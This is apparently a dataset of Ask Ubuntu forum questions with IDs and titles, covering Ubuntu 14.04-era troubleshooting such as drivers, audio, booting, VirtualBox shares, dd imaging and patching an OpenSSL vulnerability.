490984	playing game emulators on a virtualized os ( qemu/kvm )	i 'm planning on assembling a machine for development testing and all kinds of software emulation . i already know what to choose in terms of hardware , and my initial idea is installing ubuntu as the native os and qemu ( or kvm ) . but i also would like to play emulated games on that computer - nothing extremely demanding , mainly titles from the early 2000s . i know there are a dozen of good game emulators for linux , which i can install directly on top of the native ubuntu , but windows still seems to be better served with those . hence my question : if i emulate , say , windows 7 on qemu/kvm and then install a game emulator for windows ( like mame ) on that ( emulated ! ) windows 7 , how much frustration may i get from that experience in a scale of 0 % to 100 % ? why ? [ share your experiences ] also , would you have any suggestions for the native linux os + emulation platform combo ? ps : dual-booting two native oses is not an option
490985	chrome wo n't recognize java but firefox recognizes it	i am running an hp pavilion dm4-12la with ubuntu 14.04 lts 64-bit . i have installed successfully java into firefox , but for some reason in chrome it does n't work . i have tried all of this : http : //www.wikihow.com/enable-oracle-java-in-your-web-browsers-on-ubuntu-linux # google_chrome_sub https : //www.java.com/en/download/help/linux_x64_install.xml install oracle java in ubuntu ( 14.04 ) installing chrome java plugin i tried looking for the plugins in chrome : //plugins and they do n't even appear . i installed icedtea from the ubuntu software center . please help ! thank you in advanced ! !
490987	subfolder share permission on create over vbox ( ubuntu host and ubuntu guest )	first time using ask ubuntu but kind of experienced user over here . i have an ubuntu 14.04 guest and kubuntu 14.04 host using virtualbox for some important testing , and am trying to use a shared folder from my host to my guest . i have already config the shared folder over virtualbox machine config and also added the mount command on my ubuntu guest /etc/rc.local file like this : # on my guest machine mount -t vboxsf my_shared_folder /home/myguestuser/desktop/my_shared_folder and also added my ubuntu guest user to the vboxsf group : # on my guest machine sudo adduser myguestuser vboxsf now my host shared folder is actually visible from my guest desktop , but i could n't write anything there from the guest machine because it was displayed as `` root : root '' owner : # on my guest machine myguestuser @ vboxmachine : ~/desktop/my_shared_folder > ls -l total 1 drwxrwxr-x 1 root root 4096 jul 2 14:30 test so i had to do something i hate to do , gave full access to everyone on my host shared folder ( it is on another hard drive called data but it is mounted as default on my host and also with my user as owner ) : # on my host machine sudo chmod 777 /media/me/data/my\ documents/shared so now i can see my shared folder contents on my guest machine and also write on it , but everytime i create a file or a folder from the guest machine , it is created with drwxrwxr-x access rights again.. : ( how can i keep the 777 access rights for every file i create from my guest machine ?
490991	the trash launcher opens an internet browser	i just realized my trash icon is launching chrome instead of the trash . what can i do to fix it ? i already tried creating a trash.desktop file in ~/.local/share/applications but unity seems to ignore it . nautilus trash : /// does work .
490994	moving my roundcube directory to where all clients have access to it through their domain	i have just installed roundcube on my ubuntu server that has ispconfig3 running on it . i have access to roundcube but i 'm at the installation part and i 'd like to make this available through all client 's domains . for example : http : //testurl.com/webmail/ < == current url example located at : /var/www/html/webmail/ i 'd like to make this available to each client via : http : //theirdomain.com/webmail/ how would i do this ?
490995	no sound in chrome when playing youtube videos and mp3s under ubuntu 14.04	using google chrome , youtube videos load but there is no sound . playing mp3s in the browser also do n't have sound . outside of chrome , sounds works as expected . i 've tried removing and reinstalling without changing plugins , but there 's no change . how do i get audio playback to work in chrome ?
490998	fullscreen games makes mouse go haywire	i do n't really know how to describe this one , but it 's been happening on two ubuntu computers of mine . in some games , when i make them fullscreen , any mouse input makes it go absolutely insane and just decides to move to the left . the more i move the mouse , the more it moves to the left . this makes playing first person games absolutely impossible to play . i have no idea where to even start looking , does anyone have any suggestions ? so far this has happened to me in heavy bullets , interstellar marines , and sir , you are being hunted . i thought it might be a problem with the engine some of these games run on ( unity ) , but i have run other unity games just fine .
491007	i installed gnome on ubuntu 14.04 and now unity is broken	how do i fix unity . i installed gnome 14.04 and now the unity shell is broken . i tried reinstalling it . did not work .
491011	no wifi , network discovery , or recognised wireless interface after hybernation on 14.04	recently upgraded to 14.04 . worked great until computer went to sleep . on wake , all signs of anything wireless had disappeared as mentioned in title . i 've combed the forums , googled and tried so many things i 've lost track . i finally did a new install . this is a fresh install , connected via ethernet , but i previously installed back ports , tried ndis , started/stopped nm , and many other suggestions . the problem remains . i 've manually turned off/on the switch for wireless on the laptop , but am unable to fn toggle the led on . however , when i get into my bios , the internal wireless is enabled and the led turns on until i save and exit . then it turns off again . any knowledge appreciated . specs : memory 5.3 gib processor amd a6-3400m apu with radeon ( tm ) hd graphics ă 4 gallium 0.4 on amd sumo os type 64-bit disk 732.5 gb here is some relevant output . [ 1 ] : http : //pastebin.com/wpr8n8d6 [ 2 ] : http : //pastebin.com/vdmdi7gn
491014	suspend fails to go to sleep	i have an asus zenbook prime model ux-32a with kubuntu 14.04 and the suspend command does not actually suspends . when hit ( either stop button or pm-suspend command ) nothing happens . below is the dmesg associated with event , looks like the flush cache command fails . anybody has a work around or a fix for that ? alternatively it seems that pm-suspend-hybrid works , so if the above ca n't work i 'd be ( almost ) just as happy if i can make suspend call suspend-hybrid instead . [ 40229.609488 ] pm : syncing filesystems ... done . [ 40229.701963 ] pm : preparing system for mem sleep [ 40229.720287 ] freezing user space processes ... ( elapsed 0.001 seconds ) done . [ 40229.722135 ] freezing remaining freezable tasks ... ( elapsed 0.001 seconds ) done . [ 40229.723392 ] pm : entering mem sleep [ 40229.724131 ] suspending console ( s ) ( use no_console_suspend to debug ) [ 40229.724312 ] wlan0 : deauthenticating from c4:3d : c7:4f:94:39 by local choice ( reason=3 ) [ 40229.749932 ] cfg80211 : calling crda to update world regulatory domain [ 40229.749984 ] sd 1:0:0:0 : [ sdb ] synchronizing scsi cache [ 40229.750075 ] ata2.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 40229.750077 ] ata2.00 : irq_stat 0x40000001 [ 40229.750080 ] ata2.00 : failed command : flush cache [ 40229.750090 ] ata2.00 : cmd e7/00:00:00:00:00/00:00:00:00:00/a0 tag 0 [ 40229.750090 ] res 51/04:00:00:00:00/00:00:00:00:00/a0 emask 0x1 ( device error ) [ 40229.750092 ] ata2.00 : status : { drdy err } [ 40229.750095 ] ata2.00 : error : { abrt } [ 40229.750121 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache [ 40229.750242 ] sd 0:0:0:0 : [ sda ] stopping disk [ 40229.750633 ] ata2.00 : configured for udma/133 [ 40229.750637 ] ata2.00 : device reported invalid chs sector 0 [ 40229.750647 ] ata2 : eh complete [ 40229.750719 ] ata2.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 40229.750720 ] ata2.00 : irq_stat 0x40000001 [ 40229.750722 ] ata2.00 : failed command : flush cache [ 40229.750727 ] ata2.00 : cmd e7/00:00:00:00:00/00:00:00:00:00/a0 tag 0 [ 40229.750727 ] res 51/04:00:00:00:00/00:00:00:00:00/a0 emask 0x1 ( device error ) [ 40229.750729 ] ata2.00 : status : { drdy err } [ 40229.750730 ] ata2.00 : error : { abrt } [ 40229.751100 ] ata2.00 : configured for udma/133 [ 40229.751102 ] ata2.00 : device reported invalid chs sector 0 [ 40229.751111 ] ata2 : eh complete [ 40229.751180 ] ata2.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 [ 40229.751181 ] ata2.00 : irq_stat 0x40000001 [ 40229.751184 ] ata2.00 : failed command : flush cache [ 40229.751190 ] ata2.00 : cmd e7/00:00:00:00:00/00:00:00:00:00/a0 tag 0 [ 40229.751190 ] res 51/04:00:00:00:00/00:00:00:00:00/a0 emask 0x1 ( device error ) [ 40229.751191 ] ata2.00 : status : { drdy err } [ 40229.751193 ] ata2.00 : error : { abrt } [ 40229.751560 ] ata2.00 : configured for udma/133 [ 40229.751562 ] ata2.00 : device reported invalid chs sector 0 [ 40229.751569 ] ata2 : eh complete [ 40229.751574 ] sd 1:0:0:0 : [ sdb ] [ 40229.751577 ] result : hostbyte=did_ok driverbyte=driver_sense [ 40229.751579 ] sd 1:0:0:0 : [ sdb ] [ 40229.751584 ] sense key : aborted command [ current ] [ descriptor ] [ 40229.751586 ] sd 1:0:0:0 : [ sdb ] [ 40229.751589 ] add . sense : no additional sense information [ 40229.751599 ] dpm_run_callback ( ) : scsi_bus_suspend+0x0/0x40 returns -5 [ 40229.751604 ] pm : device 1:0:0:0 failed to suspend async : error -5 [ 40230.324669 ] pm : some devices failed to suspend , or early wake event detected [ 40230.333288 ] sd 0:0:0:0 : [ sda ] starting disk [ 40231.227922 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 40231.234719 ] iwlwifi 0000:02:00.0 : radio type=0x2-0x1-0x0 [ 40231.327411 ] pm : resume of devices complete after 1002.857 msecs [ 40231.327784 ] pm : finishing wakeup . thanks !
491015	ubuntu dvd does n't boot	i am trying to install ubuntu along-side win7 . after burning the iso an a dvd , i tried booting from dvd . ubuntu says `` remove media from tray , close tray and hit enter '' , which i do , but my laptop then immediately boots into win7 .
491018	unity on 14.10 - desktop issue after dist upgrade	i just upgraded the distribution from 13.04 to 14.04 and than to 14.10 in hope of some fixes but i got instead a big one that reminds me of very much of ... windows lags . i hope is not a feature . the desktop somehow does n't clear itself , the image bellow describes it better than words : i hate to say it but it worked before just fine . did you experienced this issue ? is it an effect fail ? is it a 3d graphics fail ? and more specially how do i fix it ?
491019	gromacs downloading and installation problem	how can i install gromacs version 5.0 as i 'm unable to download the tar file because the ftp connections at my place is blocked .
491020	live usb does not work !	unfortunately , i am not able to setup up ubuntu on my system as i am having trouble creating a functional live usb . i have downloaded the installer and the iso from the ubuntu download page and have created the usb but when it tries to boot up it stays stuck on `` syslinux 4.07 edd 2013-07-25 copyright ( c ) 1994-2013 h. peter anvin et al '' and just hangs till i restart it . i have formatted my usb drive to fat32 i am running on windows 8.1 with secure boot disabled i am trying to install the latest ubuntu version 14.04 ( dual boot )
491021	new to ubuntu and need some help .	hey guys i 'm new to ubuntu and decided to give it a try in a new rig i just built . i got it installed on the new machine and then when i plug my linksys ae1200 usb wireless adapter in to connect to the internet nothing happens . it is ubuntu 14.04 and i have used the lsusb in the terminal and it shows that the adapter is recognized but i ca n't get it to connect the internet .
491022	ca n't get persistent filesystem with live usb	i have been trying to create a ubuntu liveusb drive with a persistent filesystem , as i will need to use this same operating system with the same softwares and configurations in different machines . i want to be able to save my files and have some software available . i have been trying to create this liveusb using kubuntu 's startup disk creator with a .iso image and reserving 4gb of persistent space . but when i boot from the usb drive and try to create a file , it is lost after the computer is turned off , as after rebooting from the live usb i am unable to find the file i 've created .
491024	jack issue with internet dj console in ubuntu 14.04	running jack in dummy mode gives no audio from internet dj console but the stream played from the server works perfectly fine . you can tune into the stream at http : //myradiostream.com/olpr the server is a shoutcast server with the following settings . server address : s18.myradiostream.com port : 4362 bitrate : 128kbps the output from running jack in terminal looks like this ... jeremy @ zeus : ~ $ jackd -d dummy -r 44100 jackdmp 1.9.10 copyright 2001-2005 paul davis and others . copyright 2004-2013 grame . jackdmp comes with absolutely no warranty this is free software , and you are welcome to redistribute it under certain conditions ; see the file copying for details no message buffer overruns no message buffer overruns no message buffer overruns jack server starting in realtime mode with priority 10 jackgraphmanager : :connect already connected port_src = 18 port_dst = 28 jackgraphmanager : :connect already connected port_src = 19 port_dst = 29 jackgraphmanager : :connect already connected port_src = 20 port_dst = 30 jackgraphmanager : :connect already connected port_src = 21 port_dst = 31 jackgraphmanager : :connect already connected port_src = 22 port_dst = 32 jackgraphmanager : :connect already connected port_src = 23 port_dst = 33 jackgraphmanager : :connect already connected port_src = 24 port_dst = 34 jackgraphmanager : :connect already connected port_src = 26 port_dst = 34 jackgraphmanager : :connect already connected port_src = 25 port_dst = 35 jackgraphmanager : :connect already connected port_src = 27 port_dst = 35 jackgraphmanager : :connect already connected port_src = 11 port_dst = 37 jackgraphmanager : :connect already connected port_src = 12 port_dst = 38 the problem is that you can run jack like this too and get audio on the computer , but not in the stream . when you run it like this the audio on the computer is crystal clear . the stream however shows the song name and online status , but you hear nothing at all . jeremy @ zeus : ~ $ jackd -d alsa jackdmp 1.9.10 copyright 2001-2005 paul davis and others . copyright 2004-2013 grame . jackdmp comes with absolutely no warranty this is free software , and you are welcome to redistribute it under certain conditions ; see the file copying for details no message buffer overruns no message buffer overruns no message buffer overruns jack server starting in realtime mode with priority 10 audio_reservation_init acquire audio card audio0 creating alsa driver ... hw:0|hw:0|1024|2|48000|0|0|nomon|swmeter|-|32bit configuring for 48000hz , period = 1024 frames ( 21.3 ms ) , buffer = 2 periods alsa : final selected sample format for capture : 32bit integer little-endian alsa : use 2 periods for capture alsa : final selected sample format for playback : 32bit integer little-endian alsa : use 2 periods for playback jackgraphmanager : :connect already connected port_src = 18 port_dst = 28 jackgraphmanager : :connect already connected port_src = 19 port_dst = 29 jackgraphmanager : :connect already connected port_src = 20 port_dst = 30 jackgraphmanager : :connect already connected port_src = 21 port_dst = 31 jackgraphmanager : :connect already connected port_src = 22 port_dst = 32 jackgraphmanager : :connect already connected port_src = 23 port_dst = 33 jackgraphmanager : :connect already connected port_src = 24 port_dst = 34 jackgraphmanager : :connect already connected port_src = 26 port_dst = 34 jackgraphmanager : :connect already connected port_src = 25 port_dst = 35 jackgraphmanager : :connect already connected port_src = 27 port_dst = 35 jackgraphmanager : :connect already connected port_src = 11 port_dst = 37 jackgraphmanager : :connect already connected port_src = 12 port_dst = 38 please help me with this . i 've been pouring over manuals for the last week and came up with the stark realization that i 'm no audio engineer . thanks in advance ubuntu geniuses ! : ) also , addendum . restarting the computer leaves idjc with crackling audio and no sound on the stream . update i installed patchage to view my connections and it would appear that i am routing just fine to the speakers but the stream is failing to receive audio . its like the volume is turned down on the stream but the rest of the information streams over perfectly fine . people can see my dj name and information about the track and online status . they simply hear nothing ! what am i missing here in order to get audio to the stream ? i would post images but this website is preventing me from doing so citing that i have too low of a reputation points score or something . update 2 i just installed all this on a 32 bit tower and it failed in the exact same way . update 3 i got it to work in the stream ! problem is i 'm not too sure how i did it . i installed a bunch of ubuntu studio metapackages and then purged everything from my system and reinstalled idjc . its working now so i 'll take it . if anyone else sees this and needs similar help just keep working at it and you 'll do great ! i promise !
491026	changing txpower does not stay	i am trying i change txpower with the command sudo iwconfig wlan0 txpower 30 but after i enter that and type in iwconfig again , it shows the txpower is still 15 . any ideas ?
491028	vmd installation erros	i have tried to install vmd.i ran all the commands and it showed vmd is installed but when i opened the terminal and typed vmd to run the software it said command not found.how to resolve this ?
491032	what are these other sessions in ssh ?	i use virtualbox for ubuntu on my windows 7 computer . i set up ssh and got in through putty just fine . however i wanted to know how to see who was connected . so i googled a bit and found `` who '' and tried it . myname @ ubuntucomputer : ~ $ who myname :0 2014-07-02 17:55 ( :0 ) myname pts/0 2014-07-02 17:58 ( :0 ) myname pts/4 2014-07-02 19:49 ( nameofhomecomputer.home ) can anyone explain to me what these figures all mean ? why are there three ? what are the 0 's and pts/0 pts/4 thing ?
491037	monitor resolutions with open source driver vs nvidia driver , missing resolutions and refresh rates	i 'm running xubuntu 14.04 with a nvidia gt 640 ( oem dell w/gddr5 ) video card . when i use the open source driver the display detects as dell 18 '' which is correct , as it is a dell p96 trinitron display . i have all of the correct resolutions and refresh rates available . the xrandr output is as follows . jean @ jean-g41m-combo : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 8192 x 8192 dvi-i-1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 352mm x 264mm 1024x768 85.0*+ 75.1 70.1 60.0 1600x1200 85.0 75.0 70.0 65.0 60.0 1400x1050 85.0 74.9 60.0 1600x900 60.0 1280x1024 85.0 75.0 60.0 1440x900 84.8 75.0 59.9 1280x960 85.0 60.0 1366x768 60.0 1360x768 60.0 1280x800 84.9 74.9 59.8 1152x864 75.0 1280x768 84.8 74.9 59.9 1024x768i 87.1 1024x576 60.0 800x600 85.1 72.2 75.0 60.3 56.2 848x480 60.0 640x480 85.0 75.0 72.8 60.0 720x400 85.0 70.1 640x400 85.1 640x350 85.1 hdmi-1 disconnected ( normal left inverted right x axis y axis ) dp-1 disconnected ( normal left inverted right x axis y axis ) when i install the nvidia proprietary driver to gain some of the features that come with it ( such as power management of the card , 3 states ) i loose all but a handful of resolutions and only have 60hz refresh rates in the nvidia control panel , the xubuntu display configuration panel , and the xrandr output also only lists what i can see in the control panels . why is this and how do i correct it so that the display has all of the correct modes available with the nvidia 331 driver ? i 'm giving this computer to someone and i need it to 'just work ' when they connect it to their own monitor and accessories since i ca n't give them any on site help . if it makes any difference my testing monitor is connected via a dvi to vga , but i do n't think that would cause an issue . i really appreciate some help with this , i 've been going at it for 2 days and have n't had any luck . please ask if you need more details . so far i 've managed to break the display once and then repair it from only 640x480 at 59hz , i 've removed the nvidia drivers and deleted the conf files it had created to try to put it all back to a clean slate .
491040	ubuntu 14.04 lts is running super slow on compaq presario sr1232om	i have a compaq presario sr1232om with a 2.2ghz amd athlon xp 3200 processor 1.5gb ram it has on-board graphics and ubuntu 14.04 lts . it used to have windows xp on it . anyway , my problem is that when i boot ubuntu it doesnt freeze up or gray out it just lags like crazy my system meets minimum system requirements for this release but it is just super slow and i dont know why please help . also my computer is not using the right driver for the on board graphics and i cant find a driver for it my graphics driver is being reported as gallium 0.4 on llvmpipe ( llvm 0x300 ) when it isnt that
491044	using multiple desktop environments	quick question about using multiple desktop environments . can i install extra environments without affecting my current environment . i have to use a low energy demanding environment because i will not be able to charge for a few ( a lot of ) hours and i will need my laptop but i do n't want to mess up my unity and compiz setting ( they 're perfect as they are right now ) . i 'm asking because i got mixed messages saying that it is no problem as well as those that say that the universe basically exploded when they switched temporarily . ps . any recommendations for low power consuming environments ? ? i do n't want to run only a shell . a bit of a gui is appreciated . for future generations reading this : xfce works great . only change to unity is the notification window that pops up when you adjust the volume or connect to a new network . i 'm going to leave that change however because i quite like it . it is now gray and features buttons like `` skip this item '' for music songs and `` do n't show this message again '' for other notifications .
491046	what does `` ? '' mean in update-rc.d ?	i am trying to install a script using update-rc.d . # update-rc.d foo defaults then i check . # service -- status-all ... [ ? ] foo ... what does the question mark mean and how to fix it ? the script does not run after boot . thank you . foo # ! /bin/bash start ( ) { echo `` start '' } stop ( ) { echo `` stop '' } case `` $ 1 '' in start ) start ; ; stop ) stop ; ; esac exit 0
491051	ca n't find the /etc/modprobe folder	i had a problem with installing my graphics card driver , so i contacted nvidia suppprt . they told me to create a file in /etc/modprobe.d . folder . i cant find this folder , can anyone help me locate it ?
491052	pc does not boot from ubuntu live usb	my pc does not boot from the ubuntu live usb that i made to install ubuntu . what it can be ? i tried installing ubuntu on a virtual machine with the same iso and i had no problems , but when i restart the pc to install ubuntu , i can not install it there .
491054	os-prober is taking a really long time	any time i update my grub configuration or install a kernel update that has the update manager update my grub configuration , the os-prober part of the configuration hangs for sometimes 10-20 minutes . i have a few partitions including windows , ubuntu , and some other linux distros . i will post a list of my partitions below just in case that helps . any of my other distrobutions will run os-prober just fine and quickly , but in ubuntu it finds the ubuntu vmlinuz files and all very quickly and then hangs for a really long time before it will discover my other partitions with little to no disk activity during this time . once it finishes though , everything is fine , but it is really annoying for os-prober to be taking this long and i know it should n't be . sda ├─sda1 vfat dellutility ├─sda2 ntfs recovery ├─sda3 ntfs os ├─sda4 ├─sda5 ext4 ubuntu / ├─sda6 swap [ swap ] ├─sda7 ext4 arch linux ├─sda8 ext4 └─sda9 ext4 stash /media/stash sda4 is an extended partition including all the linux partitions on partitions sda5 , sda7 , and sda8 . sda6 is swap and sda9 is shared file storage . the boot loader is installed to the mbr with the configurations in ubuntu 's partition of sda5
491056	is ubuntu install frozen ?	the screen on my laptop has gone dark after i started the installation after language , wifi , and pc password selection . should i attempt to install again or is it procedural .
491059	errors when compiling insight3d	i was trying to compile insight3d and i ran into this error : g++ -o3 -c `pkg-config -- cflags opencv libxml-2.0 sdl gtk+-2.0` -i./ann_1.1.1/include/ actions.cpp in file included from geometry_structures.h:38:0 , from actions.h:28 , from actions.cpp:25 : ./sift/include/utils.h:159:45 : error : new declaration ‘char* basename ( const char* ) ’ extern char* basename ( const char* pathname ) ; ^ in file included from /usr/include/c++/4.8/cstring:42:0 , from core_debug.h:30 , from core_structures.h:29 , from geometry_structures.h:28 , from actions.h:28 , from actions.cpp:25 : /usr/include/string.h:601:26 : error : ambiguates old declaration ‘const char* basename ( const char* ) ’ extern `` c++ '' const char *basename ( const char *__filename ) ^ in file included from geometry_structures.h:28:0 , from actions.h:28 , from actions.cpp:25 : actions.cpp : in function ‘bool action_camera_resection ( size_t , bool , bool ) ’ : core_structures.h:50:177 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 4 has type ‘size_t { aka long unsigned int } ’ [ -wformat= ] # define assert_is_set ( variable_name , index ) ( is_set ( ( variable_name ) , ( index ) ) ? 0 : ( printf ( `` % s , % d : accessing undefined index % d in dynamic array '' , __file__ , __line__ , ( index ) ) , core_abort ( ) ) ) ^ actions.cpp:108:2 : note : in expansion of macro ‘assert_is_set’ assert_is_set ( shots , shot_id ) ; ^ make : *** [ actions.o ] fout 1 how can i fix this and make the compiling work ?
491060	no password input field on lock screen	occasionally my lock screen does this : that makes logging in difficult . restarting unity kind of works , sometimes only a reboot will fix it . my video card is a sapphire radeon hd 6870 with dual displays using the open drivers .
491062	question about multiple 'root ' users in mysql 's users table	+ -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | host | user | password | + -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | localhost | root | *bunch of gibberish | | localhost | phpmyadmin | *bunch of gibberish | | 127.0.0.1 | root | *bunch of gibberish | | : :1 | root | *bunch of gibberish | | localhost | debian-sys-maint | *bunch of gibberish | + -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ so i did use mysql ; and then select host , user , password from user ; it seems like there are multiple roots , a phpmyadmin , a debian-sys-maint , etc . is this normal ? should i be deleting any of these ?
491066	samba starting twice with two nic , second attempt fails	i found something posted about samba smb loading twice at boot and second one failing . i am having the same problem and also had it in ubuntu 12.04 lts . i am now running 14.40 lts with same two nic with a fresh install . both nics are setup the same in every aspect and check out fine . they are identical new hardware.could someone explain to me where i can remove the duplicate , that is if needed to , or repair the second attempt to load . please be as specific as possible as i am still a newbee at command line in ubuntu . thanks in advance.. n .
491067	eigen installation seemed to work , but i still ca n't make eigen work	i am trying to install eigen , but i do n't seem to get it to work . i did : sudo apt-get install libeigen3-dev and everything seems fine , after dpkg -p libeigen3-dev i get : package : libeigen3-dev priority : extra section : libdevel installed-size : 3718 maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > architecture : all source : eigen3 version : 3.2.0-4 depends : pkg-config suggests : libeigen3-doc size : 698062 description : lightweight c++ template library for linear algebra eigen 3 is a lightweight c++ template library for vector and matrix math , a.k.a . linear algebra . . unlike most other linear algebra libraries , eigen 3 focuses on the simple mathematical needs of applications : games and other opengl apps , spreadsheets and other office apps , etc . eigen 3 is dedicated to providing optimal speed with gcc . a lot of improvements since 2-nd version of eigen . original-maintainer : debian science maintainers < debian-science-maintainers @ lists.alioth.debian.org > homepage : http : //eigen.tuxfamily.org everything looked fine to me . however , when i try to compile the basic code ( given in the tutorial ) : first_eigen.cpp # include < iostream > # include < eigen/dense > using namespace eigen ; int main ( ) { matrix2d a ; a < < 1 , 2 , 3 , 4 ; matrixxd b ( 2,2 ) ; b < < 2 , 3 , 1 , 4 ; std : :cout < < `` a + b =\n '' < < a + b < < std : :endl ; std : :cout < < `` a - b =\n '' < < a - b < < std : :endl ; std : :cout < < `` doing a += b ; '' < < std : :endl ; a += b ; std : :cout < < `` now a =\n '' < < a < < std : :endl ; vector3d v ( 1,2,3 ) ; vector3d w ( 1,0,0 ) ; std : :cout < < `` -v + w - v =\n '' < < -v + w - v < < std : :endl ; } i run it in the shell like this : g++ -std=c++11 first_eigen.cpp -o my_exec i get the following error : first_eigen.cpp:2:23 : fatal error : eigen/dense : no such file or directory # include < eigen/dense > ^ compilation terminated . so it looks like eigen was not installed . what am i missing ?
491069	no indicators showing up on 14.04	i ca n't seem to get any indicators on my new installation of ubuntu , i 'm on a laptop so seeing the battery is pretty important , along with it just being a nuisance . i 've tried installing the indicator applet and using dconf , but they 're still not showing up . in case this matters , i had quite a few problems installing this distro , one being the 'low graphics ' error , so i had to switch from lightdm then use proprietary drivers after that . do n't know if it 's relevant but it might help . here 's a screenshot of what it looks like .
491071	windows 7/ ubuntu 14.04 dual boot . ubuntu not booting	i downloaded and installed ubuntu 14.04 on my formatted and partitioned external hard drive m : while windows is my primary os on c : . it said my installation was successful and it prompted a reboot of my machine . when it rebooted , it gave an error that windows did not successfully load due to an error in the wubildr.mbr file on the linux boot disk.i fixed the error by using the bcdedit /delete { **** } command under cmd run as an administrator . it fixed the conflict . when i try to boot into linux using the 'esc ' key upon startup and selecting the m : drive to boot from , it pauses for a second and then just boots up in windows . is there a way to solve this problem ?
491073	error message after rebooting	i am running ubuntu 14.04 in a acer aspire m5 . every time i reboot after i get the acer logo , i get the following : the disk drive for xmnt/usb-memorex_travel_drive_cl_07a50403be24ffaf-0:0 is not ready or not present . continue to wait , or press s to skip mounting or m for manual recovery . i have been pressing s for the past few weeks , and then my box will boot up normally . however , i would prefer of course to not have to do this at all every time my machine goes for reboot . can anyone please help me here ? thanks .
491075	lots of memory and cpu being used on nothing	i noticed over the last week or so my computer is using a lot of cpu and memory when nothing is obviously running ( even after rebooting ) . with only my browser open it 's using 20 % cpu , 4.0 gb memory ( i have 16 gb ) and 2.8 gb cache . how can i figure out what is wrong ? thanks ! specs : lsb version : core-2.0-amd64 : core-2.0-noarch : core-3.0-amd64 : core-3.0-noarch : core-3.1-amd64 : core-3.1-noarch : core-3.2-amd64 : core-3.2-noarch : core-4.0-amd64 : core-4.0-noarch distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise
491077	i installed the theme macbuntu on my ubuntu and it wont boot now	i dont know what to do . i have ubuntu 14.04. i think it has to do with the lockscreen setup but i dont know . i just installed ubuntu again so ill have to install macbuntu but it wont boot after finishing the installation .
491080	apt upgrade and downgrade all packages to current release	i recently upgraded from ubuntu 12.04 to 14.04 . while using 12.04 , i installed several packages via ppa 's . now that i 've upgraded to 14.04 , i 've discovered that some of the ppa packages from 12.04 are still installed . all of those ppa repositories were removed during upgrade . i would like to uninstall the ppa package versions of any package that exists in the ubuntu repositories . for example , i have a svn version of audacity that is newer than the version in the ubuntu repositories , but i want to replace it with the ubuntu repository version . i want to do the same thing with all ppa installed packages . i tried pinning this in /etc/apt/preferences.d/main package : * pin : release a=trusty pin-priority : 2001 package : * pin : release a=trusty-updates pin-priority : 2002 package : * pin : release a=trusty-security pin-priority : 2003 then apt-get update ; apt-get upgrade unfortunately , it did n't downgrade any packages like i hoped . for example , running apt-cache show catfish shows version 1.0.2-2 is available from the ubuntu repositories , but i still have 1.0.82-1~precise~ppa1 installed . i want to downgrade all packages to their current release in the ubuntu repositories .
491081	how can i add a custom shortcut to my list of applications ubuntu 14.04	i just installed ubuntu 14.04 ... wow a lot has changed since my days of version 10 lol . anyways , i installed eclipse and the android dev suite , however , in order to launch the eclipse program , i have to navigate out to it 's location under my 'home ' directory and manually double-click on the eclipse executable , it does not show up when i search the `` applications '' list . i have tried and have so far been unsuccessful at adding a shortcut , pointing to the eclipse .exe , to the applications list . since i do n't have access , only root does , i used the `` cp '' command to copy the shortcut into the usr/share/applications folder , however it still does not show up when i search for it under `` applications '' . i know i could try pinning it to the tool bar on the side , but i do not want to do that . there has to be a way to get applications to show up when searching the `` applications '' list . anyone out there know how ? so far my attempts to find the answer via google have proved futile .
491082	steps to create dd image file from usb and restore image to a different usb	i have successfully ( file created , ubuntu does not issue any error messages ) created an image from an entire persistent ubuntu live usb . ( sdc1 ) - the file ubuntu1.img is 4.3gb so it is reasonable to believe that the command /media/images/tst # dd if=/dev/sdc1 of=/media/images/tst/ubuntu1.img is correctly formatted and made a valid image of usb drive . so ... ... i try to put the image onto a newly fat32 formated usb . both the original usb and the new usb have 2 partitions , the first partition on both usbs is ubuntu live . the partition being copied to on the new usb is a little bigger than the original usb partition copied ( so size should not be a problem ) . dd command to copy image onto usb ( i cd to the folder where ubuntu1.img is located ) /media/images/tst # dd if=ubuntu1.img of=/dev/sdc1 this process also displays no errors , after about 20minutes the result is 8388607+1 records in 8388607+1 records out 4294967295 bytes ( 4.3 gb ) copied , 1615.69 s , 2.7 mb/s but ... the usb is useless bios complains about missing grldr i have tried with ubuntu , kali , backtrack , slax , and one or two other linux distros . i have tried with multiple pcs all of which boot from live usb without problem . the only way i have found to copy a linux live usb reliably , is in windows : ( ( if anyone has successfully used dd to copy a linux live usb ( any ) distro to an image file , then from same image file to a new usb ... ... ... please share some wisdom - thank you in advance for reading and taking the time to reply
491084	ubuntu 12.04 lts , openssl 1.0.1-4ubuntu5.16 and cve-2014-0224	i 've installed openssl 1.0.1-4ubuntu5.16 on my ubuntu 12.04 lts and restarted nginx . i still receive the warning from https : //www.ssllabs.com/ssltest experimental : this server is vulnerable to the openssl ccs vulnerability ( cve-2014-0224 ) and exploitable . grade set to f. any way to fix ?
491087	can i use dhclient-exit-hooks.d to update freedns.afraid.org	if i understand it correctly , the dhcp client installed in my ubuntu installation will call scripts located in /etc/dhcp/dhclient-exit-hooks.d/ after dhcp settings are acquired . i have used this in the past to update zoneedit.com dns services , so when my dynamically assigned ipv4 address is renewed i automatically update dns . can this be used with freedns.afraid.org dns services as well , and if so , how ? for reference , to update zoneedit , the script in /etc/dhcp/dhclient-exit-hooks.d/ merely calls a web service via ... wget -o - -- http-user= < my user name > -- http-passwd= < my password > 'http : //dynamic.zoneedit.com/auth/dynamic.html ? host= < my domain > '
